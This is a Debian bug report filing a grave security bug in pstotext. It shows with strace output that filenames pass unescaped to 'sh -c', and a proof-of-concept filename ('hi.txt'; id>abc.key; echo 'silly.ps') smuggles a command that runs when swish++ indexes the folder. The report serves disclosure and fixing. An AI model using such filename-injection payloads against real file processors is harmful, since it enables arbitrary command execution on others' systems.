Package: pstotext Version: 1.9-1sarge1 Severity: grave Justification: user security hole
[EMAIL PROTECTED]:/tmp/deleteme$ pstotext "a'b.ps" sh: -c: line 1: unexpected EOF while looking for matching `'' sh: -c: line 2: syntax error: unexpected end of file [EMAIL PROTECTED]:/tmp/deleteme$ mv "a'b.ps" ab.ps [EMAIL PROTECTED]:/tmp/deleteme$ pstotext "ab.ps" ESP Ghostscript 7.07.1: Unrecoverable error, exit code 1 [EMAIL PROTECTED]:/tmp/deleteme$ strace -s 256 -e trace=process -ff pstotext "a'b.ps" execve("/usr/bin/pstotext", ["pstotext", "a\'b.ps"], [/* 35 vars */]) = 0 vfork(Process 25977 attached ) = 25977 [pid 25977] execve("/bin/sh", ["sh", "-c", "gs -r72 -dNODISPLAY -dFIXEDMEDIA -dDELAYBIND -dWRITESYSTEMDICT -q -dNOPAUSE -dSAFER /tmp/ps2tvQBxTF -- \'a\'b.ps\'"], [/* 35 vars */]) = 0 sh: -c: line 1: unexpected EOF while looking for matching `'' sh: -c: line 2: syntax error: unexpected end of file [pid 25977] exit_group(258) = ? Process 25977 detached --- SIGCHLD (Child exited) @ 0 (0) --- waitpid(25977, [{WIFEXITED(s) && WEXITSTATUS(s) == 2}], 0) = 25977 exit_group(3) = ? You can see that I correctly quoted the parameter in the invoking shell, and pstotext passes the parameter to the nested sh as 'a'b.ps' which obviously gets it confused. This could be a security issue, if you can run pstotext with an arbitrary filename (eg. via swish++ running on some untrusted source). eg: [EMAIL PROTECTED]:/tmp/data$ strace -s 256 -e trace=process -ff "pstotext" "hi.txt'; id>/tmp/abc.key; echo 'silly" execve("/usr/bin/pstotext", ["pstotext", "hi.txt\'; id>/tmp/abc.key; echo \'silly"], [/* 19 vars */]) = 0 arch_prctl(ARCH_SET_FS, 0x2aaaaaf7e6d0) = 0 clone(Process 9983 attached child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x2aaaaaf7e760) = 9983 [pid 9983] execve("/bin/sh", ["sh", "-c", "gs -r72 -dNODISPLAY -dFIXEDMEDIA -dDELAYBIND -dWRITESYSTEMDICT -q -dNOPAUSE -dSAFER /tmp/ps2tIqkOjd -- \'hi.txt\'; id>/tmp/abc.key; echo \'silly\'"], [/* 19 vars */]) = 0 [pid 9983] arch_prctl(ARCH_SET_FS, 0x2aaaab0576d0) = 0 [pid 9983] clone(Process 9984 attached child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x2aaaab057760) = 9984 [pid 9983] wait4(-1, Process 9983 suspended <unfinished ...> [pid 9984] execve("/usr/bin/gs", ["gs", "-r72", "-dNODISPLAY", "-dFIXEDMEDIA", "-dDELAYBIND", "-dWRITESYSTEMDICT", "-q", "-dNOPAUSE", "-dSAFER", "/tmp/ps2tIqkOjd", "--", "hi.txt"], [/* 18 vars */]) = 0 [pid 9984] arch_prctl(ARCH_SET_FS, 0x2aaaace67b30) = 0 ESP Ghostscript 7.07.1: Unrecoverable error, exit code 1 [pid 9984] exit_group(0) = ? Process 9983 resumed Process 9984 detached [pid 9983] <... wait4 resumed> [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 9984 [pid 9983] --- SIGCHLD (Child exited) @ 0 (0) --- [pid 9983] wait4(-1, 0x7fffffb1ce14, WNOHANG, NULL) = -1 ECHILD (No child processes) [pid 9983] clone(Process 9985 attached child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x2aaaab057760) = 9985 [pid 9983] wait4(-1, Process 9983 suspended <unfinished ...> [pid 9985] execve("/usr/bin/id", ["id"], [/* 18 vars */]) = 0 [pid 9985] arch_prctl(ARCH_SET_FS, 0x2aaaaadf96d0) = 0 [pid 9985] exit_group(0) = ? Process 9983 resumed Process 9985 detached [pid 9983] <... wait4 resumed> [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 9985 [pid 9983] --- SIGCHLD (Child exited) @ 0 (0) --- [pid 9983] wait4(-1, 0x7fffffb1ce34, WNOHANG, NULL) = -1 ECHILD (No child processes) [pid 9983] exit_group(0) = ? Process 9983 detached --- SIGCHLD (Child exited) @ 0 (0) --- wait4(9983, [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 9983 exit_group(0) = ? You can clearly see that I tricked pstotext into running id and outputing the result into a temp file. If I do the following: [EMAIL PROTECTED]:/tmp/data$ touch "hi.txt'; id>abc.key; echo 'silly.ps" [EMAIL PROTECTED]:/tmp/data$ rm abc.key [EMAIL PROTECTED]:/tmp/data$ ls -l total 0 -rw-r--r-- 1 ivt ivt 0 2006-03-15 16:50 hi.txt'; id>abc.key; echo 'silly.ps I can trick swish++ into running an arbitrary command by passing the filename through pstotext: [EMAIL PROTECTED]:/tmp/data$ 'index++' -v4 '--config-file' '/usr/share/sitebuilder/core/indexing.conf' '--index-file' /tmp/abcd /tmp/data /tmp/data: hi.txt'; id>abc.key; echo 'silly.psESP Ghostscript 7.07.1: Unrecoverable error, exit code 1 (skipped: can not open) index++: done: 00:01 (min:sec) elapsed time 1 files, 0 indexed 0 words, 0 indexed, 0 unique [EMAIL PROTECTED]:/tmp/data$ ls -l total 4 -rw-r--r-- 1 ivt ivt 162 2006-03-15 16:51 abc.key -rw-r--r-- 1 ivt ivt 0 2006-03-15 16:50 hi.txt'; id>abc.key; echo 'silly.ps [EMAIL PROTECTED]:/tmp/data$ cat abc.key uid=1000(ivt) gid=1000(ivt) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),104(lpadmin),105(scanner),106(admin),1000(ivt) as you can see, pstotext was tricked into running the id command and the result appeared in abc.key. -- System Information: Debian Release: 3.1 APT prefers unstable APT policy: (50, 'unstable') Architecture: powerpc (ppc) Kernel: Linux 2.6.8-pegasos Locale: LANG=en_AU.UTF-8, LC_CTYPE=en_AU.UTF-8 (charmap=UTF-8) Versions of packages pstotext depends on: ii gs 8.01-5 Transitional package ii gs-esp [gs] 7.07.1-9 The Ghostscript PostScript interpr ii gs-gpl [gs] 8.01-5 The GPL Ghostscript PostScript int ii libc6 2.3.2.ds1-22 GNU C Library: Shared libraries an -- no debconf information -- System Information: Debian Release: 3.1 APT prefers unstable APT policy: (50, 'unstable') Architecture: powerpc (ppc) Kernel: Linux 2.6.8-pegasos Locale: LANG=en_AU.UTF-8, LC_CTYPE=en_AU.UTF-8 (charmap=UTF-8) Versions of packages pstotext depends on: ii gs 8.01-5 Transitional package ii gs-esp [gs] 7.07.1-9 The Ghostscript PostScript interpr ii gs-gpl [gs] 8.01-5 The GPL Ghostscript PostScript int ii libc6 2.3.2.ds1-22 GNU C Library: Shared libraries an -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]